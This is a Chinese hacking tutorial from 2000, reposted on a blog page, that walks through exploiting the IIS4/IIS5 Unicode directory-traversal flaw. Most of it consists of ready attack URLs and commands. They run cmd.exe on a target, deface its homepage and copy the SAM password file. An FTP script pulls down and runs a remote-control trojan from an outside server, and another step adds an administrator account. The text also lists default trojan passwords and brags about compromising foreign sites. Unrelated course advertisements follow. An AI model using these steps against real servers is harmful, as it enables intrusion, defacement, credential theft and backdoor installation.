IIS5 UNICODE 编码漏洞的利用心得

asp 专栏收录该内容
7 篇文章 0 订阅
IIS5 UNICODE 编码漏洞的利用心得
2001-04-18.21:43:46

名称:IIS5 UNICODE 编码漏洞的利用心得

http://www.cnhonker.com
Honker Union of China

  大家一定都知道那个风光了很久的IIS5 UNICODE 编码漏洞吧。没办法,第一篇教程不知道写什么好,随便先凑合着,就写一下这个漏洞的攻击心得吧。

1 首先我们来看看这个漏洞的原理。
在中文版的IIS4,和ISS5中,存在一个BUG,原因是UNICODE编码 存在BUG 在UNICODE 编码中,发现了一个奇怪的编码方式,

例如:

%c1%hh %c0%hh (0x00〈= 0xhh 〈 0x40)
IIS 把 "%c1%hh" 编码成(0xc1 -0xc0) * 0x40 + 0xhh.

例如
(Windows 2000 + IIS 5.0 + SP1 简体中文版):
http://192.168.8.48/A.ida/%c1%00.ida
IIS 将返回"@.ida" 找不到该文件 在这里 (0xc1-0xc0)*0x40+0x00=0x40='@'

http://192.168.8.48/A.ida/%c1%01.ida
IIS 将返回 "A.ida" 找不到该文件 这里 (0xc1-0xc0)*0x40+0x01=0x41='A'

http://192.168.8.48/A.ida/%c1%02.ida
IIS 将返回 "B.ida" 找不到该文件 ....

http://192.168.8.48/A.ida/%c0%21.ida
IIS 将返回 "!.ida" 找不到该文件

这就意味着你能利用这些编码的特点。

例如:
%c1%1c -〉 (0xc1 - 0xc0) * 0x40 + 0x1c = 0x5c = '/'
%c0%2f -〉 (0xc0 - 0xc0) * 0x40 + 0x2f = 0x2f = '/'

所以我们就可以用这种方法进入一些目录。

(1)http://192.168.8.48/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir

这样我们将得到
Directory of d:/inetpub/scripts
2000-09-28 15:49 〈DIR〉
.   1999-07-21 17:49 147,456
Count.exe 2000-09-12 17:08 438,290
Count25.exe 2000-10-13 15:03 8,867
counter.err 2000-08-23 23:07 160,002
counter.exe 1999-05-25 18:14 3,925
CountNT.html 1999-07-21 17:49 64,512
extdgts.exe 2000-08-10 15:24 46,352
ism.dll 1999-07-21 17:49 64,512
mkstrip.exe 1999-05-25 18:181,317
README.txt 2000-09-28 15:49

〈DIR〉 wcount 9 File(s) 935,233 bytes



(2) 我们也可以利用此BUG得到一些系统文件的内容
http://192.168.8.48/a.asp/..%c1%1c../..%c1%1c../winnt/win.ini
IIS 将把它当作 a .ASP 文件提交.它将让 asp.dll 来打开文件win.ini
如果用 IIS 4.0+SP6(中文版), 将不能测试成功 但是我们能用下列方法得到。 http://192.168.8.100/default.asp/a.exe/..%c1%1c../..%c1%1c../winnt/winnt.ini

"default.asp" 是一个存在的 .ASP 文件, "a.exe" 是一个随机的 .EXE 文件名. 它可以不存在。
打上SP1仍然还有这种编码问题。

在英文版本中使用 %c1%af 能正常利用这个漏洞。



2.了解了漏洞的详细资料。让我们来说说怎么利用。
a.利用IISExploitSearcher这个软件,我们来找有这个漏洞的主机。
虽然这个漏洞公布很久了, 但你仍然会发现,你可以找到很多这种机器。
假如我们已经找到了一台有这个漏洞的机器。

让我们来进行下面的操作。

b.http://x.x.x.x/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+c:/winnt/system32/cmd.exe+ccc.exe

这个URL语句的执行的命令是:利用NT/2000下的命令解释程序cmd.exe来执行一个拷贝命令。

copy c:/winnt/system32/cmd.exe ccc.exe

它把c:/winnt/system32/cmd.exe 拷贝到了c:/inetpub/scripts/ccc.exe

就是DOS命令中的空格,在URL中就要换成“+”号。

你要执行copy c:/winnt/system32/cmd.exe ccc.exe

相对应的是http://ip/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+c:/winnt/system32/cmd.exe+ccc.exe

其中/scripts/..%c1%1c../winnt/system32/cmd.exe?/c是固定的,他的作用是调用c:/winnt/system32/cmd.exe来执行命令。



噢,忘了说为什么要拷贝cmd.exe了。

因为微软的iis加载程序的时候检测到有串cmd.exe的话就要检测特殊字符“&(,;%<>”,所以必须改名。



c.这时c:/winnt/system32/cmd.exe已经拷贝到了c:/inetpub/scripts/ccc.exe

通过

http://ip/scripts/ccc.exe?/c

我们就可以调用到cmd.exe了,就是说不用那个编码了。

http://ip/scripts/ccc.exe?/c+echo+Hacked+by+Lion+>+c:/inetpub/wwwroot/default.asp

http://192.168.8.48/scripts/ccc.exe?/c+echo+20/10/2000+>>+c:/inetpub/wwwroot/default.asp

主页面就被修改成了:

Hacked by Lion

20/10/2000

也就是说,已经把他的主页黑了。

:P



下面是一些解释。

其中echo 是一个回显命令。

你在DOS下打一个echo Hacked by Lion 看看。

它是在屏幕上显示

Hacked by Lion

不只这样

你也可以让它把东西写进一个文件。

echo Hacked by Lion > lion.txt

这样当前目录下的lion.txt文件里就有了Hacked by Lion的字样。

其中 > lion.txt的用途是把回显的字符写进lion.txt,它覆盖原来的内容。

你如果再想用echo 20/10/2000 > lion.txt 来写剩下的内容的话,

你会发现它覆盖了原来的内容Hacked by Lion。

怎么办呢?别急!

echo Hacked by Lion > lion.txt

echo 20/10/2000 >> lion.txt

看看吧

文件里面的是

Hacked by Lion

20/10/2000

成功了。

这样,就可以用上面的解释,把空格用"+"代替,就可以向别人的主页写任何东西了。



补充一点

好多站点/inetpub/下的scripts目录删除了, 但/Program Files/Common Files/System/下 的msadc还在

(有msadcs.dll漏洞的话就不用 %c1%1c了)。

这时可以如下构造请求:

http://ip/msadc/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:/

就能调用到cmd.exe



3.当然,我们也不能只停留在黑主页的地步,当然想进一步控制整个机器了。

:P

下面来说说几种方法来控制这个机器。

a. 如果c:/winnt/repair/sam._存在

那么我们把copy c:/winnt/repair/sam._ c:/inetpub/wwwroot/

然后用浏览器下载,用破NT密码的工具,比如l0phtcrack来破。



b.上载文件

1.找一个ftp服务器,将须上载的文件copy 到ftp服务器上,

假设这个 ftp server的 ip:127.1.1.1 ,username:abc,password:bbb 文件名:srv.exe

2.编辑一个上载执行文件

http://ip/scripts/ccc.exe?/c+echo+open+home4u.china.com>+up.txt

http://ip/scripts/ccc.exe?/c+echo+pppppppppp>>+up.txt (>>号前不要有空格)

http://ip/scripts/ccc.exe?/c+echo+pppppppppp>>+up.txt

http://ip/scripts/ccc.exe?/c+echo+get srv.exe>>+up.txt

http://ip/scripts/ccc.exe?/c+echo+quit>>+up.txt

http://ip/scripts/ccc.exe?/c+tp+-s:up.txt



如果你看不懂上面的命令。

你在DOS下打一个ftp /?看看。

:P

成功率很高的哦。



3.然后http://ip/scripts/srv.exe运行它。

srv.exe是我放的一个冰河服务端。

下面不用我说了吧。

用冰河客户端连接他就可以了。

:P

顺便说一下

冰河的公用密码是:

05181977

他有70%左右的成功率。

subseven的共用密码是:

abuse

4.当然你也可以给他中一个nc99.exe等的东西。

获取administrator权限

上载getadmin.exe

getadmin iusr_机器名

这一招不一定有效哦。

http:/ip/scripts/ccc.exe?/c+net+user+aaa+12345+/add

http:/ip/scripts/ccc.exe?/c+net+localgroup+administrators+aaa+/add



c. 当然我们也有其他方法来上传文件。

前一段时间黑了几个台湾网站,net use也练得比较熟了。

看到有一个类似的教程用net use。

我也试了一下,累试不爽。呵呵

找个中转站,利用net use来上传文件。

我们要用到legion。

legion是一个扫描共享的软件。

你通过用它,你会找到一大堆的蠢伙。把整个C.D盘共享,并且不用密码的。

当然,设置密码也是没用的。呵呵猜26个字母就搞掂了。当然这要用另外一个软件。:P,在这就不说了。

找到后C盘或D盘后,

net use g: //x.x.x.x/d

把他的d映射成你的g:盘。

现在我们来把东西拷贝到他的D盘,也就是你的G盘。

copy e:/tools/srv.exe o:/

拷贝一个文件,随便你哦。:P

你也可以在我的电脑里把它拖过去就可以了。:P



操作完成就不管他了。

让我们来回到服务器上操作。

1 http://x.x.x.x/scripts/ccc.exe?/c+net+use+g:+//10.1.1.1/d

建立连接和映射。

这个过程时间可能会长一点,耐心等等。

2 http://x.x.x.x/scripts/ccc.exe?/c+dir+g:

看看东西在不在哦:P

然后

3 http://x.x.x.x/scripts/ccc.exe?/c+g:/srv.exe

直接运行就可以了。

:P

又一个中了木马。

但我不能保证它能100%成功哦。



d.用TFTP上传文件。

但具体怎么用我没试过。:(

谁知道的写信告诉我。





Lion
OICQ:5437211
bunny_lion@21cn.com
http://www.cnhonker.com
http://coollion.3322.net
2000/11/23
  • 0
    点赞
  • 0
    评论
  • 0
    收藏
  • 一键三连
    一键三连
  • 扫一扫,分享海报

打赏
文章很值,打赏犒劳作者一下
相关推荐
DirectX修复工具(DirectX Repair)是一款系统级工具软件,简便易用。本程序为绿色版,无需安装,可直接运行。 本程序的主要功能是检测当前系统的DirectX状态,如果发现异常则进行修复。程序主要针对0xc000007b问题设计,可以完美修复该问题。本程序中包含了最新版的DirectX redist(Jun2010),并且全部DX文件都有Microsoft的数字签名,安全放心。 本程序为了应对一般电脑用户的使用,采用了易用的一键式设计,只要点击主界面上的“检测并修复”按钮,程序就会自动完成校验、检测、下载、修复以及注册的全部功能,无需用户的介入,大大降低了使用难度。在常规修复过程中,程序还会自动检测DirectX加速状态,在异常时给予用户相应提示。 本程序适用于多个操作系统,如Windows XP(需先安装.NET 2.0,详情请参阅“致Windows XP用户.txt”文件)、Windows Vista、Windows 7、Windows 8、Windows 8.1、Windows 8.1 Update、Windows 10,同时兼容32位操作系统和64位操作系统。本程序会根据系统的不同,自动调整任务模式,无需用户进行设置。 本程序的V4.0版分为标准版、增强版以及在线修复版。所有版本都支持修复DirectX的功能,而增强版则额外支持修复c++的功能。在线修复版功能与标准版相同,但其所需的数据包需要在修复时自动下载。各个版本之间,主程序完全相同,只是其配套使用的数据包不同。因此,标准版和在线修复版可以通过补全扩展包的形式成为增强版。本程序自V3.5版起,自带扩展功能。只要在主界面的“工具”菜单下打开“选项”对话框,找到“扩展”标签,点击其中的“开始扩展”按钮即可。扩展过程需要Internet连接,扩展成功后新的数据包可自动生效。扩展用时根据网络速度不同而不同,最快仅需数秒,最慢需要数分钟,烦请耐心等待。如扩展失败,可点击“扩展”界面左上角小锁图标切换为加密连接,即可很大程度上避免因防火墙或其他原因导致的连接失败。 本程序自V2.0版起采用全新的底层程序架构,使用了异步多线程编程技术,使得检测、下载、修复单独进行,互不干扰,快速如飞。新程序更改了自我校验方式,因此使用新版本的程序时不会再出现自我校验失败的错误;但并非取消自我校验,因此程序安全性与之前版本相同,并未降低。 程序有更新系统c++功能。由于绝大多数软件运行时需要c++的支持,并且c++的异常也会导致0xc000007b错误,因此程序在检测修复的同时,也会根据需要更新系统中的c++组件。自V3.2版本开始使用了全新的c++扩展包,可以大幅提高工业软件修复成功的概率。修复c++的功能仅限于增强版,标准版及在线修复版在系统c++异常时(非丢失时)会提示用户使用增强版进行修复。除常规修复外,新版程序还支持C++强力修复功能。当常规修复无效时,可以到本程序的选项界面内开启强力修复功能,可大幅提高修复成功率。请注意,请仅在常规修复无效时再使用此功能。 程序有两种窗口样式。正常模式即默认样式,适合绝大多数用户使用。另有一种简约模式,此时窗口将只显示最基本的内容,修复会自动进行,修复完成10秒钟后会自动退出。该窗口样式可以使修复工作变得更加简单快速,同时方便其他软件、游戏将本程序内嵌,即可进行无需人工参与的快速修复。开启简约模式的方法是:打开程序所在目录下的“Settings.ini”文件(如果没有可以自己创建),将其中的“FormStyle”一项的值改为“Simple”并保存即可。 新版程序支持命令行运行模式。在命令行中调用本程序,可以在路径后直接添加命令进行相应的设置。常见的命令有7类,分别是设置语言的命令、设置窗口模式的命令,设置安全级别的命令、开启强力修复的命令、设置c++修复模式的命令、控制Direct加速的命令、显示版权信息的命令。具体命令名称可以通过“/help”或“/?”进行查询。 程序有高级筛选功能,开启该功能后用户可以自主选择要修复的文件,避免了其他不必要的修复工作。同时,也支持通过文件进行辅助筛选,只要在程序目录下建立“Filter.dat”文件,其中的每一行写一个需要修复文件的序号即可。该功能仅针对高级用户使用,并且必须在正常窗口模式下才有效(简约模式时无效)。 本程序有自动记录日志功能,可以记录每一次检测修复结果,方便在出现问题时,及时分析和查找原因,以便找到解决办法。 程序的“选项”对话框中包含了7项高级功能。点击"常规”选项卡可以调整程序的基本运行情况,包括日志记录、安全级别控制、调试模式开启等。只有开启调试模式后才能在C
本套餐将包括两个重磅性的课程与一个赠送学习的课程,分别为SpringBoot实战视频教程与RabbitMQ实战教程跟SSM整合开发之poi导入导出Excel。目的是为了让各位小伙伴可以从零基础一步一个脚印学习微服务项目的开发,特别是SpringBoot项目的开发,之后会进入第二个课程:RabbitMQ的实战,即消息中间件在实际项目或者系统中各种业务模块的实战并解决一些常见的典型的问题!核心的知识点分别包括 一、SpringBoot实战历程课程 (1)SpringBoot实战应用场景的介绍与代码实战 (2)发送邮件服务、上传下载文件服务、Poi导入导出Excel (3)单模块与多模块项目构建、项目部署打包、日志、多环境配置、lombok、validator以及mybatis整合实战跟多数据源实战 (4)Redis缓存中间件的实战与缓存雪崩跟缓存穿透等问题的解决实战 (5)RabbitMQ消息中间件在业务模块异步解耦、通信、消息确认机制以及并发量配置等的实战 二、RabbitMQ实战教程课程 (1)RabbitMQ的官网权威技术手册拜读,认识并理解各大专有名词,如队列,交换机,路由,死信队列,消息确认机制等等 (2)RabbitMQ在业务服务模块之间的异步解耦通信实战,如异步记录日志与发送邮件等 (3)商城系统抢单高并发情况下RabbitMQ的限流作用与代码实战 (4)消息确认机制与并发量配置并用来实战商城用户下单 (5)死信队列深入讲解与DLX,DLK,TTL等概念的讲解并用来实战 “支付系统用户下单后支付超时而失效其下单记录”实战 详情,各位小伙伴可以查看两个课程的目录。相信学完该套餐相关课程后,你的实战能力将大大提升!涨薪将不再遥遥无期! 最后,赠送的SSM整合开发之POI导入导出Excel目的是为了让各位小伙伴也可以学习Spring+SpringMVC+Mybatis整合开发的项目,让大家一对比SpringBoot与SPring的项目开发流程以及复杂程度!!! 相信学完之后,你会对SpringBoot爱不释手!!
<p> <strong><span style="font-size:16px;color:#003399;">会用Python分析金融数据 or 金融行业会用Python</span></strong> </p> <p> <strong><span style="font-size:16px;color:#003399;">职场竞争力更高</span></strong> </p> <p> <br /> </p> <p> <img src="https://img-bss.csdnimg.cn/202012231042221925.png" alt="" /> </p> <p> <br /> </p> <p> <br /> </p> <p> <strong><span style="font-size:16px;color:#003399;">Python金融数据分析入门到实战</span></strong> </p> <p> <strong><span style="font-size:16px;color:#003399;">Get√金融行业数据分析必备技能</span></strong> </p> <p> <img src="https://img-bss.csdnimg.cn/202012231042438069.png" alt="" /> </p> <p> <br /> </p> <p> <br /> </p> <p> <strong><span style="font-size:16px;color:#003399;">以股票量化交易为应用场景</span></strong> </p> <p> <strong><span style="font-size:16px;color:#003399;">完成技术指标实现的全过程</span></strong> </p> <p> <br /> </p> <p> <span style="font-size:14px;">课程选取股票量化交易为应用场景,由股票数据的获取、技术指标的实现,逐步进阶到策略的设计</span><span style="font-size:14px;">和回测,由浅入深、由技术到思维地为同学们讲解Python金融数据分析在股票量化交易中的应用</span><span style="font-size:14px;">。</span> </p> <p> <br /> </p> <p> <span style="font-size:14px;"><br /> </span> </p> <p> <img src="https://img-bss.csdnimg.cn/202012231043183686.png" alt="" /> </p> <p> <br /> </p> <p> <br /> </p> <p> <strong><span style="font-size:16px;color:#003399;">以Python为编程语言</span></strong> </p> <p> <strong><span style="font-size:16px;color:#003399;">解锁3大主流数据分析工具</span></strong> </p> <p> <br /> </p> <p> <span style="font-size:14px;">Python做金融具有先天优势,课程提取了Python数据分析工具NumPy、Pandas及可视化工具</span><span style="font-size:14px;">Matplotlib的关键点详细讲解,帮助同学掌握数据分析的关键技能。</span> </p> <p> <img src="https://img-bss.csdnimg.cn/202012231043472858.png" alt="" /> </p> <p> <strong><span style="font-size:16px;color:#003399;"><br /> </span></strong> </p> <p> <strong><span style="font-size:16px;color:#003399;">2大购课福利</span></strong> </p> <p> <strong><span style="font-size:16px;color:#003399;"><br /> </span></strong> </p> <p> <img src="https://img-bss.csdnimg.cn/202012300628195864.png" alt="" /> </p>
©️2020 CSDN 皮肤主题: 大白 设计师:CSDN官方博客 返回首页

打赏

rida

你的鼓励将是我创作的最大动力

¥2 ¥4 ¥6 ¥10 ¥20
输入1-500的整数
余额支付 (余额:-- )
扫码支付
扫码支付:¥2
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、C币套餐、付费专栏及课程。

余额充值